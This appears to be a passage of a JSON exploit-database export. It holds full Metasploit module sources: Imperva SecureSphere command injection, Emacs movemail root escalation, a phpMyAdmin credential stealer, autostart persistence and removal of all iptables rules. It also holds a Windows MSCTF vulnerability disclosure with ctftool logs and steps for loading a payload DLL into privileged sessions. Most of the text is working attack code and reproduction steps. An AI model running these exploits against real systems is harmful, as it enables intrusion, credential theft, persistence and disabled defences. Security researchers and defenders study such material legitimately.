"modified": "2019-03-06T03:57:42", "published": "2019-01-08T06:18:04", "id": "MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC", "href": "", "type": "metasploit", "title": "Imperva SecureSphere PWS Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Imperva SecureSphere PWS Command Injection',\n 'Description' => %q(\n This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs didn't properly sanitize user supplied command\n parameters and directly passes them to corresponding CLI utility,\n leading to command injection. Agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '45542' ]\n ],\n 'DisclosureDate' => \"Oct 8 2018\",\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PrependFork' => true,\n },\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'CmdStagerFlavor' => %w{ echo printf wget },\n 'Targets' =>\n [\n ['Imperva SecureSphere 13.0/13.1/13.2', {}]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']),\n OptString.new('PASSWORD', [false, 'Agent registration password', '']),\n OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),\n OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])\n ])\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ]\n end\n\n def check\n begin\n res = execute_command('id')\n rescue => e\n vprint_error(\"#{e}\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /uid=\\d+/\n return CheckCode::Vulnerable\n end\n\n CheckCode::Safe\n end\n\n def exploit\n unless CheckCode::Vulnerable == check\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n print_status(\"Sending payload #{datastore['PAYLOAD']}\")\n execute_cmdstager\n end\n\n def execute_command(cmd, opts = {})\n data = {\n 'command' => 'impctl server status',\n 'parameters' => {\n 'broadcast' => true,\n 'installer-address' => \"127.0.0.1 $(#{cmd})\"\n }\n }\n\n res = send_request data\n\n return unless res\n\n if res.code == 401\n fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')\n end\n\n unless res.code == 406 && res.body.include?(\"impctl\")\n fail_with(Failure::Unknown, 'Server did not respond in an expected way')\n end\n\n res\n end\n\n def send_request(data)\n req_params = {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => data.to_json\n }\n\n if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?\n unless @cookie\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n unless res\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n @cookie = res.get_cookies\n end\n\n req_params['cookie'] = @cookie\n req_params['headers'] = {\n 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\n }\n end\n\n send_request_cgi(req_params, datastore['TIMEOUT'])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/imperva_securesphere_exec.rb"}, {"lastseen": "2019-11-20T03:52:47", "bulletinFamily": "exploit", "description": "This module exploits a SUID installation of the Emacs movemail utility to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local. The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.\n", "modified": "2018-12-03T18:22:40", "published": "2018-11-16T08:50:20", "id": "MSF:EXPLOIT/UNIX/LOCAL/EMACS_MOVEMAIL", "href": "", "type": "metasploit", "title": "Emacs movemail Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n\n Rank = ExcellentRanking\n\n include Msf::Post::File\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Emacs movemail Privilege Escalation',\n 'Description' => %q{\n This module exploits a SUID installation of the Emacs movemail utility\n to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.\n },\n 'Author' => [\n 'Markus Hess', # Discovery? atrun(8) exploit for sure\n 'Cliff Stoll', # The Cuckoo's Egg hacker tracker\n 'wvu' # Module and additional research\n ],\n 'References' => [\n %w[URL https://en.wikipedia.org/wiki/Movemail],\n %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],\n %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],\n %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],\n %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],\n %w[URL https://mailutils.org/manual/html_node/movemail.html]\n ],\n 'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'SessionTypes' => %w[shell],\n 'Privileged' => true,\n 'Payload' => {'BadChars' => \"\\n\", 'Encoder' => 'generic/none'},\n 'Targets' => [['/usr/lib/crontab.local', {}]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'CMD' => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'\n }\n ))\n\n register_options([\n OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def bin_path\n '/bin:/usr/bin:/usr/ucb:/etc'\n end\n\n def movemail\n datastore['MOVEMAIL']\n end\n\n def crontab_local\n '/usr/lib/crontab.local'\n end\n\n def crontab(cmd)\n \"* * * * * root #{cmd}\\n* * * * * root rm -f #{crontab_local}\"\n end\n\n # uname(1) does not exist, technique from /etc/rc.local\n def is_43bsd?\n cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')\n end\n\n # id(1) does not exist\n def is_root?\n cmd_exec('whoami').include?('root')\n end\n\n # test -u does not exist\n def setuid_root?(path)\n cmd_exec(\"find #{path} -user root -perm -4000 -print\").include?(path)\n end\n\n def setup\n super\n\n vprint_status(\"Setting a sane $PATH: #{bin_path}\")\n\n case cmd_exec('echo $SHELL')\n when %r{/bin/sh}\n vprint_status('Current shell is /bin/sh')\n cmd_exec(\"PATH=#{bin_path}; export PATH\")\n when %r{/bin/csh}\n vprint_status('Current shell is /bin/csh')\n cmd_exec(\"setenv PATH #{bin_path}\")\n else\n vprint_bad('Current shell is unknown')\n end\n\n vprint_status(\"$PATH is #{cmd_exec('echo $PATH').chomp}\")\n end\n\n def check\n unless is_43bsd?\n vprint_warning('System does not appear to be 4.3BSD')\n end\n\n unless file?(movemail)\n vprint_bad(\"#{movemail} not found\")\n return CheckCode::Safe\n end\n\n unless movemail.end_with?('movemail')\n vprint_warning(\"#{movemail} has an unexpected name\")\n end\n\n unless setuid_root?(movemail)\n vprint_status(\"Non-SUID-root #{movemail} found\")\n return CheckCode::Detected\n end\n\n vprint_good(\"SUID-root #{movemail} found\")\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n print_good('Session is already root, executing payload directly')\n return cmd_exec(payload.encoded)\n end\n\n unless check == CheckCode::Appears || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n # outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);\n if file?(crontab_local)\n fail_with(Failure::NoTarget, \"#{crontab_local} already exists\")\n end\n\n print_status('Preparing crontab with payload')\n tab = crontab(payload.encoded)\n vprint_line(tab)\n\n # umask (umask (0) & 0333);\n # (void) ftruncate (indesc, 0L);\n print_status(\"Creating writable #{crontab_local}\")\n cmd_exec(\"(umask 0 && #{movemail} /dev/null #{crontab_local})\")\n\n unless writable?(crontab_local)\n fail_with(Failure::NoAccess, \"#{crontab_local} is not writable\")\n end\n\n print_good(\"Writing crontab to #{crontab_local}\")\n cmd_exec(\"echo '#{tab.gsub(\"'\", \"'\\\\\\\\''\")}' > #{crontab_local}\")\n print_warning('Please wait at least one minute for effect')\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/local/emacs_movemail.rb"}, {"lastseen": "2019-11-19T17:30:26", "bulletinFamily": "exploit", "description": "This module gathers Phpmyadmin creds from target linux machine.\n", "modified": "2018-09-07T16:13:09", "published": "2018-08-19T18:10:19", "id": "MSF:POST/LINUX/GATHER/PHPMYADMIN_CREDSTEAL", "href": "", "type": "metasploit", "title": "Phpmyadmin credentials stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Phpmyadmin credentials stealer\",\n 'Description' => %q{\n This module gathers Phpmyadmin creds from target linux machine.\n },\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['meterpreter'],\n 'Author' => [\n 'Chaitanya Haritash [bofheaded]',\n 'Dhiraj Mishra <dhiraj@notsosecure.com>'\n ]\n ))\n end\n\n def parse_creds(contents)\n db_user = contents.scan(/\\$dbuser\\s*=\\s*['\"](.*)['\"];/).flatten.first\n db_pass = contents.scan(/\\$dbpass\\s*=\\s*['\"](.*)['\"];/).flatten.first\n\n unless db_user && db_pass\n print_error(\"Couldn't find PhpMyAdmin credentials\")\n return\n end\n\n print_good(\"User: #{db_user}\")\n print_good(\"Password: #{db_pass}\")\n\n print_status(\"Storing credentials...\")\n store_valid_credential(user: db_user, private: db_pass)\n end\n\n def run\n print_line(\"\\nPhpMyAdmin Creds Stealer!\\n\")\n\n if session.platform.include?(\"windows\")\n print_error(\"This module is not compatible with windows\")\n return\n end\n\n conf_path = \"/etc/phpmyadmin/config-db.php\"\n unless file_exist?(conf_path)\n print_error(\"#{conf_path} doesn't exist on target\")\n return\n end\n\n print_good('PhpMyAdmin config found!')\n res = read_file(conf_path)\n unless res\n print_error(\"You may not have permissions to read the file.\")\n return\n end\n\n print_good(\"Extracting creds\")\n parse_creds(res)\n\n p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')\n print_good(\"Config file located at #{p}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/phpmyadmin_credsteal.rb"}, {"lastseen": "2019-11-30T03:57:00", "bulletinFamily": "exploit", "description": "This module will create an autostart entry to execute a payload. The payload will be executed when the users logs in.\n", "modified": "2018-08-20T09:51:41", "published": "2018-07-15T10:01:30", "id": "MSF:EXPLOIT/LINUX/LOCAL/AUTOSTART_PERSISTENCE", "href": "", "type": "metasploit", "title": "Autostart Desktop Item Persistence", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Unix\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Autostart Desktop Item Persistence',\n 'Description' => %q(\n This module will create an autostart entry to execute a payload.\n The payload will be executed when the users logs in.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Eliott Teissonniere' ],\n 'Platform' => [ 'unix', 'linux' ],\n 'Arch' => ARCH_CMD,\n 'Payload' => {\n 'BadChars' => '#%\\n\"',\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic python netcat perl'\n }\n },\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },\n 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0\n ))\n\n register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])\n end\n\n def exploit\n name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)\n\n home = cmd_exec('echo ~')\n\n path = \"#{home}/.config/autostart/#{name}.desktop\"\n\n print_status('Making sure the autostart directory exists')\n cmd_exec(\"mkdir -p #{home}/.config/autostart\") # in case no autostart exists\n\n print_status(\"Uploading autostart file #{path}\")\n\n write_file(path, [\n \"[Desktop Entry]\",\n \"Type=Application\",\n \"Name=#{name}\",\n \"NoDisplay=true\",\n \"Terminal=false\",\n \"Exec=/bin/sh -c \\\"#{payload.encoded}\\\"\"\n ].join(\"\\n\"))\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/autostart_persistence.rb"}, {"lastseen": "2019-11-26T05:15:45", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.\n", "modified": "2019-01-24T17:22:19", "published": "2018-07-12T12:16:22", "id": "MSF:POST/LINUX/MANAGE/IPTABLES_REMOVAL", "href": "", "type": "metasploit", "title": "IPTABLES rules removal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'IPTABLES rules removal',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n\n if command_exists?(\"iptables\")\n print_good(\"Deleting IPTABLES rules...\")\n cmd_exec(\"iptables -P INPUT ACCEPT\")\n cmd_exec(\"iptables -P FORWARD ACCEPT\")\n cmd_exec(\"iptables -P OUTPUT ACCEPT\")\n cmd_exec(\"iptables -t nat -F\")\n cmd_exec(\"iptables -t mangle -F\")\n cmd_exec(\"iptables -F\")\n cmd_exec(\"iptables -X\")\n print_good(\"iptables rules successfully executed\")\n else\n print_line(\"iptables rules could not be executed\")\n end\n if command_exists?(\"ip6tables\")\n print_good(\"Deleting IP6TABLES rules...\")\n cmd_exec(\"ip6tables -P INPUT ACCEPT\")\n cmd_exec(\"ip6tables -P FORWARD ACCEPT\")\n cmd_exec(\"ip6tables -P OUTPUT ACCEPT\")\n cmd_exec(\"ip6tables -t nat -F\")\n cmd_exec(\"ip6tables -t mangle -F\")\n cmd_exec(\"ip6tables -F\")\n cmd_exec(\"ip6tables -X\")\n print_good(\"ip6tables rules successfully executed\")\n else\n print_line(\"ip6tables rules could not be executed\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/manage/iptables_removal.rb"}], "zdt": [{"lastseen": "2019-12-04T04:02:21", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-08-15T00:00:00", "published": "2019-08-15T00:00:00", "id": "1337DAY-ID-33126", "href": "https://0day.today/exploit/description/33126", "title": "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities", "type": "zdt", "sourceData": "The msctf subsystem is part of the Text Services Framework, The TSF manages things like input methods, keyboard layouts, text processing and so on. There are two main components, the ctfmon server and the msctf client.\r\n\r\nThe ctfmon service creates an ALPC port in a well known location, to which clients connect and exchange messages. When any process creates a window, the kernel invokes a callback, USER32!CtfHookProcWorker, that automatically loads the CTF client.\r\n\r\nThe CTF subsystem is vast and complex. It was most likely designed for LPC in Windows NT and bolted onto ALPC when it became available in Vista and later. The code is clearly dated with many legacy design decisions. In fact, the earliest version of MSCTF I've been able to find was from the 2001 release of Office XP, which even supported Windows 98. It was later included with Windows XP as part of the base operating system.\r\n\r\nThere are multiple critical design flaws in this system, I've written a detailed technical analysis and an interactive utility to probe the CTF subsystem.\r\n\r\n$ ./ctftool.exe\r\nAn interactive ctf exploration tool by @taviso.\r\nType \"help\" for available commands.\r\nMost commands require a connection, see \"help connect\".\r\nctf> help\r\nType `help <command>` for help with a specific command.\r\nAny line beginning with # is considered a comment.\r\n\r\nhelp - List available commands.\r\nexit - Exit the shell.\r\nconnect - Connect to CTF ALPC Port.\r\ninfo - Query server informaiton.\r\nscan - Enumerate connected clients.\r\ncallstub - Ask a client to invoke a function.\r\ncreatestub - Ask a client to instantiate CLSID.\r\nhijack - Attempt to hijack an ALPC server path.\r\nsendinput - Send keystrokes to thread.\r\nsetarg - Marshal a parameter.\r\ngetarg - Unmarshal a parameter.\r\nwait - Wait for a process and set it as the default thread.\r\nthread - Set the default thread.\r\nsleep - Sleep for specified milliseconds.\r\nforget - Forget all known stubs.\r\nstack - Print the last leaked stack ptr.\r\nmarshal - Send command with marshalled parameters.\r\nproxy - Send command with proxy parameters.\r\ncall - Send command without appended data.\r\nwindow - Create and register a message window.\r\npatch - Patch a marshalled parameter.\r\nmodule - Print the base address of a module.\r\nmodule64 - Print the base address of a 64bit module.\r\neditarg - Change the type of a marshalled parameter.\r\nsymbol - Lookup a symbol offset from ImageBase.\r\nset - Change or dump various ctftool parameters.\r\nshow - Show the value of special variables you can use.\r\nlock - Lock the workstation, switch to Winlogon desktop.\r\nrepeat - Repeat a command multiple times.\r\nrun - Run a command.\r\nscript - Source a script file.\r\nprint - Print a string.\r\nconsent - Invoke the UAC consent dialog.\r\nreg - Lookup a DWORD in the registry.\r\nMost commands require a connection, see \"help connect\".\r\nctf> connect\r\nThe ctf server port is located at \\BaseNamedObjects\\msctf.serverDefault2\r\nNtAlpcConnectPort(\"\\BaseNamedObjects\\msctf.serverDefault2\") => 0\r\nConnected to CTF [email\u00a0protected]\\BaseNamedObjects\\msctf.serverDefault2, Handle 00000248\r\nctf> info\r\nThe server responded.\r\n000000: 20 00 38 00 02 10 00 00 ec 04 00 00 a4 1a 00 00 .8.............\r\n000010: dc b6 00 00 35 1b 2e 00 38 00 00 00 20 2a 00 00 ....5...8... *..\r\n000020: 00 00 00 00 00 00 00 00 ec 04 00 00 00 00 00 00 ................\r\n000030: 00 00 00 00 00 00 00 00 ........\r\n Monitor PID: 1260\r\nctf>\r\n\r\nPlease see the attached document for a detailed analysis, but here are my major concerns with the service:\r\n\r\n1. The ctfmon ALPC port is accessible across sessions, allowing users to compromise other users of the system.\r\n2. UIPI can be bypassed, sending input events to higher integrity windows. This is an AppContainer or IL sandbox escape.\r\n3. The msctf client disables UIPI for Marshal event windows. As far as I can tell, this is unnecessary, only ctfmon should be sending these messages, which is already high integrity.\r\n4. The MSG_CALLSTUB command does not validate the command index, allowing arbitrary code execution.\r\n 4a. Frankly, even if you call a legitimate stub, you\u2019re often trusted to Marshal pointers across the interface. \r\n\r\nMany of the legitimate functions expect pointers with no validation (For example, CInputProcessorProfiles::Register, which is called via CStubITfInputProcessorProfileMgr::stub_ActivateProfile, FunctionIndex 3 for TfInputProcessorProfileMgr)\r\n\r\n5. There is no mutual authentication of Servers or Clients, therefore:\r\n 5a. You can hijack the alpc server path for other sessions and wait for clients to connect to you, then send them input.\r\n 5b. You can lie about your ThreadId, ProcessId and HWND, effectively redirecting messages from other clients.\r\n\r\nI'm planning to write a full SYSTEM exploit for these issues, because I think it's interesting and I've already invested a ton of work to get the tool working to make a PoC :)\r\n\r\nI assume you'll want a copy when it's finished.\r\n\r\nInterfering with processes across sessions\r\n------------------------------------------\r\n\r\nTo reproduce, follow these steps:\r\n* Login as an Administrator to Session 1.\r\n* Please make sure that you do not have an open copy of notepad.\r\n* Use Fast User Switching (i.e. Ctrl-Alt-Del, Switch User) to create an unprivileged standard user session.\r\n* Create a file containing these commands:\r\n\r\nconnect Default 1\r\nSleep 10000\r\nwait notepad.exe\r\ncreatestub 0 4 IID_ITfInputProcessorProfileMgr\r\nsetarg 6\r\nsetarg 0x201 0x41414141\r\nsetarg 0x20001 0x41414142\r\nsetarg 0x1 ABABABAB-ABAB-ABAB-ABAB-ABABABABABAB\r\nsetarg 0x1 BCBCBCBC-BCBC-BCBC-BCBC-BCBCBCBCBCBC\r\nsetarg 0x10001 0x41414145\r\nsetarg 0x201 0x41414146\r\ncallstub 0 0 3\r\nquit\r\n\r\nRun the following command:\r\n\r\nPS Z:\\Home> cat .\\script.txt | .\\ctftool.exe\r\n\r\n* Use fast user switching to return to Session 1.\r\n* Run windbg -c g \u2018notepad.exe\u2019\r\n* Wait 10 seconds, observe that notepad dereferences 0x41414141.\r\n\r\nThis proves that an unprivileged user can interact with processes on a privileged session.\r\n\r\nUIPI can be bypassed, sending input events to higher integrity windows.\r\n-----------------------------------------------------------------------\r\n\r\nUse the following command to make ctftool.exe Low Integrity:\r\n\r\n> icacls ctftool.exe /setintegritylevel low\r\n\r\nObserve that the tool can still connect, scan, and interact with Windows.\r\n\r\nThe msctf client disables UIPI for Marshal event windows.\r\n---------------------------------------------------------\r\n\r\nmsctf!SYSTHREAD::LockThreadMessageWindow allows Marshal messages across integrity levels, I suspect this is a bug and unnecessary.\r\n\r\nThe MSG_CALLSTUB command does not validate the command index.\r\n-------------------------------------------------------------\r\n\r\nThis is the (decompiled) code that handles MSG_CALLSTUB (Command 0xA, I just guessed the name):\r\n\r\n // Get pointer to appended Data\r\n ProxyInfo = MsgBase::GetProxyInfoPtr(*MessagePtr);\r\n if ( ProxyInfo )\r\n {\r\n ms_exc.registration.TryLevel = 0;\r\n Systhread = this->Systhread;\r\n if ( Systhread->StubArray )\r\n {\r\n FoundStub = 0;\r\n FindStub(Systhread->StubArray, ProxyInfo->StubId, &FoundStub);\r\n if ( FoundStub )\r\n {\r\n if ( FoundStub->TimeStamp == ProxyInfo->TimeStamp )\r\n Result = FoundStub->vtbl->invoke(FoundStub, ProxyInfo->FunctionIndex, MessagePtr);\r\n }\r\n }\r\n ms_exc.registration.TryLevel = -2;\r\n }\r\n return Result;\r\n\r\nHere, MessagePtr and ProxyInfo are entirely untrusted data, but that is then used to call an arbitrary index from a table, and the invoke method looks like this:\r\n\r\nint __thiscall CStubITfCompartment::Invoke(CStubITfCompartment *this, unsigned int FunctionIndex, struct MsgBase **Msg)\r\n{\r\n return (*(&CStubITfCompartment::_StubTbl + FunctionIndex))(this, Msg);\r\n}\r\n\r\n(All the Invoke functions look similar)\r\n\r\nReproduce like this:\r\n\r\nPS Z:\\Home> .\\ctftool.exe\r\nAn interactive ctf exploration tool by @taviso.\r\nType \"help\" for available commands.\r\nctf> connect\r\nThe ctf server port is located at \\BaseNamedObjects\\msctf.serverDefault1\r\nctf> scan\r\nClient 0, Tid 3976 (Flags 0x08, Hwnd 00000F88, Pid 4012, explorer.exe)\r\nClient 1, Tid 780 (Flags 0x08, Hwnd 0000030C, Pid 4012, explorer.exe)\r\nClient 2, Tid 692 (Flags 0x08, Hwnd 000002B4, Pid 4012, explorer.exe)\r\nClient 3, Tid 4420 (Flags 0x0c, Hwnd 00001144, Pid 4352, SearchUI.exe)\r\nClient 4, Tid 7964 (Flags 0x08, Hwnd 00001F1C, Pid 7920, conhost.exe)\r\nClient 5, Tid 7116 (Flags 0x08, Hwnd 00001BCC, Pid 7112, procexp.exe)\r\nClient 6, Tid 9616 (Flags 0000, Hwnd 00002590, Pid 2096, ctfmon.exe)\r\nClient 7, Tid 9048 (Flags 0x08, Hwnd 00002358, Pid 11660, windbg.exe)\r\nClient 8, Tid 1020 (Flags 0x08, Hwnd 000003FC, Pid 4652, notepad.exe)\r\nClient 9, Tid 11620 (Flags 0000, Hwnd 00002D64, Pid 3776, ctftool.exe)\r\nctf> createstub 1020 4 IID_ITfInputProcessorProfileMgr\r\nCommand succeeded, stub created\r\nDumping Marshal Parameter 3 (Base 00CAA4B0, Type 0x106, Size 0x18, Offset 0x40)\r\n000000: 4c e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c L..q(....*..[.C\\\r\n000010: 01 00 00 00 33 01 61 12 ....3.a.\r\nMarshalled Value 3, COM {71C6E74C-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x12610133\r\nctf> setarg 6\r\nNew Parameter Chain, Length 6\r\nctf> setarg 0x201 0x41414141\r\nMarshalled Value 0, INT 0000000041414141\r\nctf> setarg 0x201 0x41414146\r\nMarshalled Value 1, INT 0000000041414146\r\nctf> setarg 0x201 0x41414146\r\nMarshalled Value 2, INT 0000000041414146\r\nctf> setarg 0x201 0x41414146\r\nMarshalled Value 3, INT 0000000041414146\r\nctf> setarg 0x201 0x41414146\r\nMarshalled Value 4, INT 0000000041414146\r\nctf> setarg 0x201 0x41414146\r\nMarshalled Value 5, INT 0000000041414146\r\nctf> callstub 0 0 0xffff\r\nSending the Proxy data failed, 0x80004005\r\nctf> q\r\n\r\n\r\nThere is no mutual authentication of clients and servers.\r\n----------------------------------------------------------\r\n\r\nTo reproduce this issue, as an unprivileged session use the command `hijack` to create a new ALPC server, then create a privileged session.\r\n\r\nFor example, `hijack Default 2`, to hijack the server for session 2 on the default desktop.\r\n\r\nWhen the new session is created, the tool will dump information as new privileged clients attempt to connect to the fake service.\r\n\r\nPS: Z:\\Home> .\\ctftool.exe\r\nAn interactive ctf exploration tool by @taviso.\r\nType \"help\" for available commands.\r\nctf> hijack Default 1\r\nNtAlpcCreatePort(\"\\BaseNamedObjects\\msctf.serverDefault1\") => 0 00000218\r\nNtAlpcSendWaitReceivePort(\"\\BaseNamedObjects\\msctf.serverDefault1\") => 0 00000218\r\n000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00 ..0.. ......D...\r\n000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00 .....f......D...\r\n000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05 ............ ...\r\nA a message received\r\n ProcessID: 4352, SearchUI.exe\r\n ThreadId: 4420\r\n WindowID: 00020180\r\nNtAlpcSendWaitReceivePort(\"\\BaseNamedObjects\\msctf.serverDefault1\") => 0 00000218\r\n000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. ..........\r\n000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00 .y...f..........\r\n000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00 ................\r\nA a message received\r\n ProcessID: 4012, explorer.exe\r\n ThreadId: 780\r\n WindowID: 00010110\r\nNtAlpcSendWaitReceivePort(\"\\BaseNamedObjects\\msctf.serverDefault1\") => 0 00000218\r\n000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. ..........\r\n000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00 ....*g..........\r\n000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00 ............X...\r\nA a message received\r\n ProcessID: 4012, explorer.exe\r\n ThreadId: 780\r\n...\r\n\r\nNotes on the tool\r\n-----------------\r\n\r\n* I have only tested it on Windows 10.\r\n* The tool is interactive and uses readline, type help for a list of commands.\r\n* You can have the source if you like, please let me know.\r\n* The tool is unfinished, I plan to make a full working exploit but wanted to get the ball rolling on disclosure.\r\n\r\n\r\nThe code has been tested with latest Win10 x64 as of 05/21, but I had to hardcode some offsets.\r\n\r\nIn particular, I have msctf.dll 10.0.17763.348 and kernelbase.dll 10.0.17763.475 (I think those are the only two relevant modules).\r\n\r\n1. As an unprivileged user, execute `query user` to see all the others users on the system.\r\n\r\n2. Open ctfmonexploit.ctf in notepad, and set the connect line to the sessionid you want to compromise. \r\n\r\n3. Copy the exploit payload dll into c:\\Windows\\Temp, call it exploit.dll.\r\n\r\n4. Run `icacls c:\\Windows\\Temp\\exploit.dll /grant \"Everyone:(RX)\"`\r\n\r\n5. Run `cat ctfmonexploit.ctf | .\\ctftool.exe`\r\n \r\n6. The dll is loaded into a High Integrity process of the specified session when the session is next active.\r\n\r\n\r\nI got this attack working from unprivileged user to SYSTEM, even from LPAC.\r\n\r\nThe trick is to switch to the WinLogon desktop, which an unprivileged user can do using USER32!LockWorkstation().\r\n\r\nPS Z:\\Home\\Documents\\Projects\\alpc> .\\ctftool.exe\r\nAn interactive ctf exploration tool by @taviso.\r\nType \"help\" for available commands.\r\nMost commands require a connection, see \"help connect\".\r\nctf> connect Winlogon 1\r\nThe ctf server port is located at \\BaseNamedObjects\\msctf.serverWinlogon1\r\nNtAlpcConnectPort(\"\\BaseNamedObjects\\msctf.serverWinlogon1\") => 0xc0000034\r\nWaiting for the specified port to appear...\r\nNtAlpcConnectPort(\"\\BaseNamedObjects\\msctf.serverWinlogon1\") => 0\r\nConnected to CTF [email\u00a0protected]\\BaseNamedObjects\\msctf.serverWinlogon1, Handle 00000224\r\nctf> scan\r\nClient 0, Tid 6324 (Flags 0000, Hwnd 000018B4, Pid 